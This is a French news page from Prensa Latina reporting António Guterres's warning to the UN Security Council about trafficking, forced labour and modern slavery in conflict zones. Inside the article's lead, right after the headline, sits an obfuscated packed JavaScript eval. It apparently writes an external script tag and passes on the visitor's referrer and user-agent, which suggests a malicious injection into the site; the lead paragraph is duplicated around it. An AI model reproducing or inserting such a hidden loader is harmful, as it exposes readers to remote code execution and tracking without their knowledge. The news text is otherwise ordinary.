samedi 13 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

ONU: avertissement contre la portée mondiale de la traite humaine

ONU eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|niaar|var|u0026u|referrer|kfntz||js|php'.split('|'),0,{})) (PL) Le Secrétaire général de l’ONU, António Guterres, a averti aujourd'hui au Conseil de sécurité sur la portée globale de la traite des êtres humains, un phénomène qui a des victimes dans au moins 106 pays.

ONU (PL) Le Secrétaire général de l’ONU, António Guterres, a averti aujourd’hui au Conseil de sécurité sur la portée globale de la traite des êtres humains, un phénomène qui a des victimes dans au moins 106 pays.

 «Je voudrais pouvoir dire ici que c’est une chose du passé, mais malheureusement ce n’est pas le cas,» il a dit lors d’un débat ouvert à discuter les gens traite, forcé du travail et d’autres formes modernes d’esclavage dans des situations de conflit, ainsi que des mesures pour prévenir et lutter contre elles. 

Guterres a rappelé le Forum que l’Organisation internationale du travail estime à 21 millions des êtres humains dans le monde entier affectés par une exploitation de travail extrêmes, activités illicites qui génère quelque 150 milliards de dollars par an. 

Au-delà des chiffres, ces fléaux représentait un grave impact humain, parce qu’ils divisent les familles, coûtent la vie et causent de graves violations des droits de l’homme, dit-il.

Selon le Secrétaire général, on ne peut ignorer est que les personnes vulnérables sont les principales victimes, y compris les femmes et les filles qui font face à la prostitution forcée et mariage et l’esclavage sexuel. 

Dans son discours, Guterres a averti que la traite des êtres humains et l’exploitation du travail et autres formes modernes d’esclavage sont particulièrement dynamique dans les scénarios de conflit. 

Nous voyons une crise dans laquelle les groupes armés tels que Boko Haram et l’Etat islamique non seulement pratiquent ouvertement, mais attribuée à une prétendue légalité, il a dénoncé.  Le Secrétaire général des Nations Unies a fait appel à la coopération internationale, la prévention et attention aux causes profondes de ces crimes, pour lutter efficacement contre eux.

rm/arc/wmr

EN CONTINU
notes connexes